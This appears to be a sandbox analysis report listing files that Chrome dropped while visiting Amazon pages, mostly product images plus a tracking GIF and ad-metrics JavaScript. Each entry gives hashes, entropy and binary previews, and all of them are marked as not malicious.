                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D27%26pc0%3D335%26ld0%3D335%26t0%3D1723469088412%26sc1%3Dportal-bb%26pc1%3D5%26ld1%3D5%26t1%3D1723469088295%26sc2%3DcsmCELLSframework%26bb2%3D629%26pc2%3D629%26ld2%3D629%26t2%3D1723469088706%26sc3%3DcsmCELLSpdm%26bb3%3D629%26pc3%3D636%26ld3%3D636%26t3%3D1723469088713%26sc4%3DcsmCELLSvpm%26bb4%3D636%26pc4%3D636%26ld4%3D636%26t4%3D1723469088713%26sc5%3DcsmCELLSfem%26bb5%3D636%26pc5%3D636%26ld5%3D636%26t5%3D1723469088713%26sc6%3Due_sushi_v1%26bb6%3D636%26pc6%3D637%26ld6%3D637%26t6%3D1723469088714%26ctb%3D1:2624
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):15564
                                                                                                                                                                                                                                                                Entropy (8bit):7.929041309669881
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:AWNe9qpq88Q6fvXDwuFutf0sMmMcM5+ttRZxViYx:4E6nX9wN0sBvJxXx
                                                                                                                                                                                                                                                                MD5:82DD3020DD812A65BA785F498E7238C7
                                                                                                                                                                                                                                                                SHA1:B7663E459F95EAD65839D55790435DE9D1C2343D
                                                                                                                                                                                                                                                                SHA-256:B5B3B5AD1EB00BD367A41C693C940EA976C75B124578CFC6BA12B69641C686AC
                                                                                                                                                                                                                                                                SHA-512:6808DEA02213CC436CBF5CF9D14D87907140CC2322109EC5BE2B85CDBC793535F87FDBFF129F424F2FF5653E4F568DF87B54DEC919D02A7E28717A908A006A6C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4........................................................................c[.O..nV... /o ...?...?D..n..................=...y..M.......vK....j...hV9...y..'........................V3.|..nyaNS+....2.<r@.+..".=0.....z.G.3.:.6.@.............r.9~.pV.T.Ays..O.~.w.wD..5.^cR............:.w~j....byf@............C.~~..F;.`..q.....^.BJ.*.....2.\ND.}...D..k.m..`...a....>...............,..1J...,.nf+....T.V....K...&..[........K......K..&.......s_I...@..........`.:.#..O.Y.!1.<..^.[..e.....K..</.......ld...w...*t..+V.lkm.V...1S.....>s.uy.................A......V[D\B.....v..U.[...U..TO~..o<>...<...nc...(..d..s..c"...L...1...~...........q...q.z...........A...T....6..`.....%.b..........+.3..........+_YU$.......$......_.?K{.~.Y.[G...7./..........C.M.9....i.f..v..AZ....9.._^tn.Z........K
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):25733
                                                                                                                                                                                                                                                                Entropy (8bit):7.975709405109247
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:AsKBkXxeg5y/8I74/pLChpol4/0x0TOmc5lkePAibI8zuOXgZi9Oxv5eNE:a1/8K4BLChpjVE5l/AibI8aqgZZxxEE
                                                                                                                                                                                                                                                                MD5:5E29A4047CBD9F3124CCE1CB8997D9A6
                                                                                                                                                                                                                                                                SHA1:35AC2AD1E2EFD33BF584070958206C09D55937DD
                                                                                                                                                                                                                                                                SHA-256:F95F7CDC0917BB81498A8A6DE468DE7373EB0826AAE16D4127FCC2278B00FAA4
                                                                                                                                                                                                                                                                SHA-512:CA8F93D096DA022CCBBC8E25B73D8D8FA071D2EE1856287FB9D507CA86F6BA772229DB98F41BD2C95F470B369151D524F4FBCE57942C22BB6DBD6F22590E2CB9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61aUMxz8J-L._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5.........................................................................................Ac.h....fh..&7.9.|.^.e..>.b.....Z......e3._.d$....(............>..D.+Ue.N0..i.3...[..c......}2](._.9..Fd..~..my7....7...w7v"....^7A.N....]>Ay..*.R...-J..]b.)Z.]...=.0.j.90...........^.+..w=W..GK..x).5h...L.w....?~...3...h.....l...{n{..nG.X......-gDOs...c..cS..N.n.x.%.5u..d.........X..#.......>{2.......N.....U....=.b0g....Mt.4.]m.|..=..J...\.Lh..x=.....r....z^.N#.|.].h...l..5.....6...W...q..1.........W...s.j...;../7..G7....h.6. ....}..Q..#.!.........i.U....=.7.a..Vl..o.b...yo...T..4....[..CT..i...h7..)..tBv.3..S0>.O^<.....Ga.S.<.._...}mr+..f7uycu...n.[.......w.......F.G..m....w.m.z....i......K...4N.....3./..$.|.Z ..\....Q..LE.=......=.m...........a.?f......+.g@...m/..f.u.|.u_.i)_E
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25781
                                                                                                                                                                                                                                                                Entropy (8bit):7.965987596311549
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:70v/om1nzDPGjupe9YFu6npeeG1N3DO+y:Dm1n/GjupegzLGTzOb
                                                                                                                                                                                                                                                                MD5:DD3025FBA8198FE551489BE56F9045FD
                                                                                                                                                                                                                                                                SHA1:6BD2557DD7A1E1AEBBDD9E17C9E50060BC22D44A
                                                                                                                                                                                                                                                                SHA-256:CD08BB063312BC60016C51BAE229CEB5BF9EFF4D8332B4C2F7C84232F55D1158
                                                                                                                                                                                                                                                                SHA-512:7E59FF84DCFD09A2793F99F450A3DB753B49A1833772BC226F827CFB24C7FDC00F013C832B794797BE643DF9DB1F4680F9F039A94AE704563FD605590FFF0E22
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................0.{.."..........8.....................................................................................................................o..+b...B..GMO....?~p>.........9>.....>9.m............."..lz./Z-V.j.k...Ts.>.....*..S.T...(E...........H.u.IU~.O..2........(.......z..}.jr..o.t....Q......tn:..s]\..N..J../.....6...S............(.Z.>........r..r3...I.c.0o...{E.Q.iR..t.....v.r@0.S_..*.9....AH\9=..;.....7.f...\.y..E.$x.....dM..e.m{.d........A.>?.OX....Fg.....[..,~.a...f.9..5...&..?...|...W,s.n5[..uy.7.3.]z.c.g.5c.&E..;..B.>....n\|.....mK.h.v.......SM.=.T.u..:.W...1}[.Y......m.G.U...Y*%.....y..t.1.......i.%...........^Q..Y5...Q.X...B.....H.e]W...j.^L..a.F.......P.KCcP...1.^....T+.;c..z:u...r.......$..LS..........]..P..%.....Q.-x...c[..L.......:.w......"... .....=.....k{..a.......>i.....N.\.Wx...F
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 157x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5441
                                                                                                                                                                                                                                                                Entropy (8bit):7.907944693020856
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TteL5vy7mI/0hUP0PG8ItEP2KhjBgV4wW+HzgFPN7g6BC+W:IFUVP8G8PNhVLwHzgo6BfW
                                                                                                                                                                                                                                                                MD5:E11DFD233AAA77F7DF59C846F1678910
                                                                                                                                                                                                                                                                SHA1:FED2757F1056DE22DF5A35BFBCF8CE3B89B36149
                                                                                                                                                                                                                                                                SHA-256:AFA70DF5B455009F5AB67D56BF1B6466A0D78FF6E4C2997D6A2CF0DC24701A81
                                                                                                                                                                                                                                                                SHA-512:C4E0820F03E5512471CF8D272B9BE7463539C6D0BFD0B7A263B0DF8F7C82C83DA6CC7997B15C4AC1FC59684C3BCA5D4E11950BBB1F8C14DDFDEB69E690060648
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/51APRC2x3IL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!"1A..Qa..R...2Bq....#Crs.$%...3Sb...............................................1.!Aq.............?..R..R..R..R.......F.s..8....g.i.....NR.Sq...nzz.q.f....>]..&...-..h.. (3.(..(..(..(..(..(..(..(....../.....j.q..|1.@X...Pc.WT....v.R.Os*.Ve..K.O.`(..s=.-.JU..m..v.<6.m.....+.../....H..*F...f.p..Ua.../.V.P.x._y..8.....u(...P...........)\z<....RG..J.JR.JR.JR.JR.JR.JR.JR.P..u<....p..h....uW.ZG~....5.cku.^..$l..0..g ..@r..qg.qTR..!6R....X.HS...H..q.Z.Z....MB..G9.^...6.HL.G...$......~.7r]..H6+.V)o#.(....w...O!..W>k........)r.1....[....q...+..l..7.F.(*......6.c..X..yNQ$..a$Icu.).7)....WU..:.O..#.`di.=....9q..$.: ={j...(..(..(..(..(..(..(.T.|l...o.\.L..z...pX PF.u..q.Z..k.$..(..c9VVP.2r...E......DZ.B...g;../p`Dd%...:3.6..."9tGl...N..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1888
                                                                                                                                                                                                                                                                Entropy (8bit):7.5917338157932415
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0kNw8jM2kM8or0g/qQEl8QwsSYdLtyBNDV9U1CQznX:TMAMy8sDZa8nKeBR4QQznX
                                                                                                                                                                                                                                                                MD5:4A63B2280F3E13B697E5F0391C9633F7
                                                                                                                                                                                                                                                                SHA1:DE3DCE1178A4C966D65763D5AAD0BDD07078D540
                                                                                                                                                                                                                                                                SHA-256:8984CB5A520E6CE7843C2FD8711FBE2D7081CDD31AA3BA1A4E512D9C973618EE
                                                                                                                                                                                                                                                                SHA-512:47BBAE2F375554915173CD7E3498885720655766C9736D2189B49CC92069B295CC86D87170455ACF4171F41E83E302812F48C1961F95CC8937B5CC892A13C127
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........2................................................................v..........#I%;.[.KzQ#....j..[T..@....2..%..kX........zR(.......ZmQ:...5}+.......N....d.^y7..';.}..7.z9..B.sgO.9...].}...[...N@...B..+..........;.hy..F...41H......?A. .S.b>".*...UZ.V>.*.X..[.?n.0.. ...................?...@..........................!AQ..."12R.....0a...Bq.....#S`b$3r..........?....X.3.N\.h.I01.8..........?.y.x.A.e..O.?..W.i..y.\ I...?/.....[SN.i.hB........Z.q.....2D...I.p1...>A.d.o..hV=....<.J...I.&.p.."..9u:.}.$...W...u.RB.H.!Z...|.)Zd1.-.P7.'.........._@..,;...V..t..t+Xr..(...JA.4o2.o..v`..Yqv.7S..~..6R.b."..r.(J.\...bDa.+TI.N.2....2...-..^;.!iA..(..E.I....U......\B..\...x.o.....}Hum)Z.+._.....Ah.2Nu$\C.T..&..i[.?..M.`8..$....I6H......u..@>&%.j..X...W....N.@J....-R......... ......>....6RS..-..PR..@..)...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (30956)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31002
                                                                                                                                                                                                                                                                Entropy (8bit):5.263859562616461
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:HkhQ+LMasRxY7xky/1VXYmkDsdJS4Ok0o0MRbjigQeUpteUHiyYNDbDUhBGP95xD:AQms7kx9E4Ok2rKLP9
                                                                                                                                                                                                                                                                MD5:055C05372F5DFC6548345AC9EEAE6E31
                                                                                                                                                                                                                                                                SHA1:81AE805B0ACE186FEDAFFB681415144B73860388
                                                                                                                                                                                                                                                                SHA-256:7D14FAAF807F0DECFDF513F91AAD06F18704B4DE223201E16A638F42F91DEED9
                                                                                                                                                                                                                                                                SHA-512:E37106F6CA36CAFBF3041466F14DEA1E89C0CF7788E1536A0B82DB4D39BF15BE538FE5E793AE119AF813F75AE7DEFD68BB8D3E0832D992181CAAA089C4D57CD8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(()=>{const e="sfImpression",t="LightAdImpression",i="viewablelatency",a=(e,t,i)=>({csaKey:e,csmKey:t,csmMessage:i}),s=(a("bodyBegin","bb",e),a("bodyBegin","bb",t),a("bodyEnd","be")),r=(a("clickToATF","af"),a("criticalFeature","cf")),n=(a("criticalFeature","cf",e),a("criticalFeature","cf",t),a("loaded","ld")),o=a("loaded","ld",e),l=(a("loaded","ld",t),a("viewablelatency:bodyBegin","bb",i),a("viewablelatency:loaded","ld",i),(e,t)=>{console.error(e,t)}),d=e=>{e.sendLatencyMetric(n),e.sendLatencyMetric(r)},c=e=>"V"===e,h={1027:"Sponsored Display DRA"},m={1:"Enabled",0:"NotEnabled","-1":"Unknown"},u=e=>v(e),v=e=>decodeURIComponent(escape(atob(e))),p=e=>e&&0===Object.keys(e).length&&e.constructor===Object;let g=null,w=null,b=null,f=null,y=null;const C=new class{viewabilityStandards(){return f=f||[],f}payload(){return b=b||{},b}},M={ext:{inViewPercentage:()=>(g=g||0,Math.round(100*g)),geom:()=>(w=w||{},w)}},x={playingTime:()=>(y=y||0,y)},E=()=>C,P=()=>x,T=e=>{var t,i,a,s;g=void 0!==(null==e|
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 156x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8587
                                                                                                                                                                                                                                                                Entropy (8bit):7.9538565708915865
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:KDut92UP35c1i9KtGOlWA7okTKRWyOtS2bVUm6ySAI+iw/RoOgcn:owMUP35cA9KtGO4AmIy2JDB/G+
                                                                                                                                                                                                                                                                MD5:9857EBCDBBE860D5BF07F87140A1CD7C
                                                                                                                                                                                                                                                                SHA1:4B8218BBF12D6504520CB0D4A63834D7E915B511
                                                                                                                                                                                                                                                                SHA-256:8B7AA9CC1907498FDFF8DA437C9F6B0B5D284B9C6BCCD4CD21E62F7B14E1A85A
                                                                                                                                                                                                                                                                SHA-512:BA0614B2D971B4CE515B01B5CA67C464D92A389C07692B2352883FA5F26E06DF69E12690CC7C916F1D511DA9647219C803853DB433D3183CECF9AE6B234B0205
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..."1A.Qq..as.#26B....3Sbcrtu......$%4Rd...D...................................................!1."3Aq...BCQ....D...#$24a................?..tQE..QE..QE..QE..R.Tv.m.]./a...p.w-...... 7.mF.=.j.O.Z...<...)......k).w.O..&....jw$...O|v.YO..g.5,.jZu.]..{qv...Ws.8.......4......N....Zh.9+{.[....tW.&w.J....N4...ou....\D.O/.I.t..t{H.b@..41..72..Zm._.X....'..m.......$e".QN.F.............YQ'.C.mY.y.......Z..c{R.....M.......K.....U...U.%..Y..p...._..WSY.P.b..d.8.1..Fm..U./.`.]Q..L\..4.~...:\....F..7.N..X=...O..0..'..r.......m.E....x.K......./.0..z..S...F....6.S.R9.V=..^...;...M......6...q.H.(..yF..zsQbG..W._....,R......Xd.*.t.[j..1....G.k6.%.fOD....x5~.m^.f.....+..<..g.=.|.z.E$y.(...(...(...(.....Z...S.>bD0...<.o4m.3H..x..A]q.2...A.lCq.9......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3580
                                                                                                                                                                                                                                                                Entropy (8bit):7.8527941356594475
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tc5XcbbbbgrbbXdr9o2b7hgr+6kbyDQmLnHm9qSg:kMbbbbgrbbNrxb96gbyDHnHm9qv
                                                                                                                                                                                                                                                                MD5:D83B3D5665BFEC2F03F674E308740003
                                                                                                                                                                                                                                                                SHA1:58878D526DD661F686A4D721D67E8BEE97553865
                                                                                                                                                                                                                                                                SHA-256:F89CB2D5A271BCAA4F53E9A23EDAE296BB129F14222FBE3755C41A7511281204
                                                                                                                                                                                                                                                                SHA-512:C013676DA05B3BF59B827CB61935EE0DA10ED436B7CB823FF90ADD12B7440772749EF0F18C66F5A0CCB074794825FF587E640C44FE1C2C04F74F7C308210281D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71Azno56mDL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1.A."Qq..2Ba......3Rrs.4..#$5CD.................................................!12.3A."Bq#Q..............?..................M...t..a...i.OQ....J..Jc.'.nD......B.[....7.......w.\LU .......................................U..4.....7*.S...$V..O.B.Z...3.VZ........^.........]....0gQ.N:..r.........GU....W*.....B........>Y.&..M.s..@....}..Pc...5.]..\..|2...............................~).t$.N3I.........&..OO......J...D4Y..d`e!..Y.{..1.v...K.m..............}s\x|..(...,:.....[w,...H.NA.a..r6......RM.D.N.M.S..n.N..e;........s.)q.mISx;..BNar~.bzx.?....4pU..._..Wf....t[w.-t..2s..i9...T.7Q.-.i.9.....T.../b..h..TDD.D@DD.D@DD.D@DD..'\(.t...k.3..z......}..?.....\..&F.;.d..du..rq+a....x..%Hc.^...n.....8.i,..6.....s.E.}Tb.g!.m...9...m....PT.y.0.X.4..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6924
                                                                                                                                                                                                                                                                Entropy (8bit):7.813547861396539
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:wviM/p7s49//revoJPmSeILKtLbdnDE+CqR:wvA4Jivo4SeImxdDj
                                                                                                                                                                                                                                                                MD5:909343879704912F23D92B955CA2F3E1
                                                                                                                                                                                                                                                                SHA1:FCFA9764EEE3FFBE0AB13E238EE49BCB482E384E
                                                                                                                                                                                                                                                                SHA-256:3C6C008035CC69F01A65A399EFBDC898317C783D091E5A37E6B482C30B0A88C5
                                                                                                                                                                                                                                                                SHA-512:77CB48EEC0E658C993D593CE582E967176F18DEB2756CA052B333A82952C081D254C39C96E2F95417BB707D54AC9708A8EDC87EC4612CA426633939279936572
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......0.{.."..........4....................................................................@..........................................WE...\z;#....~.qUS..g.m..o.h...............J1.C....+..??l.S9..o...#......~......`...........V..7..6..q..1..n..}..[...b..;.I/.H.....}.....du............\..<S...e..w...rQk|W..`bQ}..C........[.~..0.........4...&...}4.mZ.X.iQe..$.e.....t.k.Q...Q.=.|...........,._..>g.r.^_..>.Z)b.kU.R.A:.}....R)a........:..................x...?O..B.,..[$R.O..H..=4.J......|...;aZv...........-.?..~..)c.....g..Y-....f.e.h.$.hR..4."..L...s{..................p.U./f'..^.;...b.xf.C%...%X.....!.................|.........]....~..I....x.X.K.u"....%.....s.=.GJ...../.E..}..P.;.u.........1e.i..>..If.I..6x%.z..R.f..-K...........<...3.;.Zv..........{....L.9.....e.....Uf.....b.-~..4..Z....H.[.l#8......:.......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10675
                                                                                                                                                                                                                                                                Entropy (8bit):7.86251499446065
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:SiHNN8GPKID/M/brKBZC1Ld9vggD1kSjKWJDtd04OhwvxIIZ41RzvX/nfU0:SiHNlR/SKySSjKOdzN+XnfU0
                                                                                                                                                                                                                                                                MD5:5528AF6B9D4F634740DB649EAF00B09C
                                                                                                                                                                                                                                                                SHA1:87075E6F75073AE925DAED4B178B4051E49A4C37
                                                                                                                                                                                                                                                                SHA-256:B2A3B839E6E4B56E74CDF2C8D69B3FCF9C9D46655DC4325028C5BD00EE7918E1
                                                                                                                                                                                                                                                                SHA-512:F67630C3830712A56998B1D91D365DD05AF0F15F9F1F0F89B9B130EB9D3E49F56F154924BFA8B5E74180B3643786BAF53A444F898443E7D785610E4A71165222
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........2...............................................................`................W....t.%}...s..b.P....................qY.;......~._..y"Gq..0.................%..5..S....p.....(.,.w".1^..1...kO..................*}......10s..8..............&i...Lm.y....................-Wk...Bl.x..L6..^x.q..PG.>K.{..5..T..1......y..D}@.............2......A....5..w..>.s..+.".%.hw.....f&eK....."..k.........................l....l5..`...|.C$a'.d?....M?..p.!...i-.....].w.................Op6Z...A....-.....t*..H.I..k....I..<.vYX.zK5..W..tR................M.......`."...+-5.....2Gr$zB.'7.v..;.F.'eb.i-..^.B.Q[.....................V7/..........l.|... ...e"t4.ki.[.'\.Cw...]L>d..f9P..............J..'..F.js.z.^.b..+m..\ct....gi...5................S..<...{.Y.....$0.......\..uzR...~..................]l..{0=........5..S.i.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5646
                                                                                                                                                                                                                                                                Entropy (8bit):7.821788006816416
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TuuRJNoC1UYW4P6VUH0spJWdS/AahuTw/GlZOu1G8li8Brr9Y8oU6av8j:ioNTK49HPTIQuEulYu1GcBlHv0j
                                                                                                                                                                                                                                                                MD5:CF7A4095B9C49F009805281D5823A45B
                                                                                                                                                                                                                                                                SHA1:588C7E2316A22343D1BF3ED0F0AF5FD93E4ED634
                                                                                                                                                                                                                                                                SHA-256:B47C2A9577099B53C86998483FD37BEE6D98FCE9B4DF96943CE6AE9FB1A0B3EF
                                                                                                                                                                                                                                                                SHA-512:CD3E835C07C683CD11DADD942705DE9BD96EB3BFA3359A6C7FE9708019B8E08FDF83E1AB06885276825DFCBDA4883641EA715BBD816334261B5C160902E0F10C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6.................................................................................y.:t..m.y@.z...O.~..:..l....N.q..&'pW.;n4..$....O,D...D....<t..|s.a..5.o.....\N........x......p....<..o.t........Tv....{..W3.o..v.{...}...b...~....a....7.Ag.....?0B|v.<~..Y..zz*oi;.A....N......}.+mqT....f.+....O~..-........(....U.%....!f:.!.:.x?a...$.k.....:.g.....;.4.D....?.O.......o.k...r..S.H.u;I.!.F..n....y.).......%x..,.....=....3.C}@....0..u}..V]..9+.r.z.r..T.Vue...kC.}..$s.c[m&j.......lw..x.,...).G...n..n..p..sY.G~....w1...,........x...=.7kLQ.,.^,.].0..Mf.....,.....0y...#.N?..e.jrv..u..U....c......".o.Q|..{_....B..x.........0.z.SX....j....i..N.wuo.._..............................0.............................!013 "#2C@A`4BPQR.............F..0.`.Gz~....NrI.)..LtJc.S....t.t*C.R.....Ltja.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 222x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5065
                                                                                                                                                                                                                                                                Entropy (8bit):7.911447078487028
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TzFazNDsYr02ROPJOIqkPH46kidSXE5VAu1F2rh38KRMEDd0GGSogn:PFwSSR4PYLiCiquPCNd0NSRn
                                                                                                                                                                                                                                                                MD5:C7CF2E269FB4CD2CA64EFF17C6A530B0
                                                                                                                                                                                                                                                                SHA1:ECD20243E8C4AA1EC4CB10B5A9E0E158B9B3C4E0
                                                                                                                                                                                                                                                                SHA-256:A5A8E36878AD6BF4CABFCBD83D8F052A11385F45F978146D0B41C5FD21E12FAF
                                                                                                                                                                                                                                                                SHA-512:E831CD28961C88EE0CC1C7C2CC04A01766500AD2B63539508A58F8D0A4FF6DCDE8131C047A09DC7DFCD8FB3D04E8B932C0F99B5F4F1AFCBC5CA41F2C5A89CC05
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1Q..Aaq....."2RSr.....3B.#Cb....%s....c.............................................!.1..a............?..hB..B..B..B..B..B.y.6.*p.:J.G....k72.....hm1{..i.?.a5....=...T.......f..{[....Aa.wIq.V1$.lBA..Y..8.gk...;.KWZ\.G.lT.s.:..Q...\.l.i...k#.........Oc....Y.I7...(\...ig.9..,....8O..X......s.....O./d.68R,..@..b..G`B.,.sV....~......h].Bb......*.b4..A..x.~....u...!..!..!..!..!..!..!.....m..g....7..q-7 XX.~U..N...6:.$Y.....B*L>.Y........x..+...FJ.|Z1UQ....F>..rw...nr....%...U.t3y.8.c..q.....t[...s....j9.H..@-q.. .r$....J.'....:iIl..h%.1.$._3.o...U...p.......#..b.X..d7.y....!1..[.50..5...#..lsu."v....$.[......3..w!...5..'...].D.w..~../..V....d...........Rd..6....J.9.O.*..!.Fd.[...b.y.o.+3...V..oD...j..;|.5.....&......L.......~W[
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                                Entropy (8bit):5.159855577168781
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Qs73HgB/nQn/r3Us6J9YM5UNb5IpDyXF0H1U:Z73hLUb6eaIpUUU
                                                                                                                                                                                                                                                                MD5:DEEC4DFF24B7DFF507AFE0324689C086
                                                                                                                                                                                                                                                                SHA1:C4B9CE7C0DAD9F3264DBECE3E230AC517D20EDB9
                                                                                                                                                                                                                                                                SHA-256:774883AD552C2BDA4F7B0C179C9E6FBFC80AA9BAAAE82A08CF1DBEBA022ACE94
                                                                                                                                                                                                                                                                SHA-512:E72F1A72AC2E2333BD7D649D91D2C157F214994F6F9FC17D730B900D252A78572583FA0F756FBF1A69B1DA554DE2F2DB8F1E99EE27D83C1A22BEE9E81A05D78D
                                                                                                                                                                                                                                                                Malicious:false
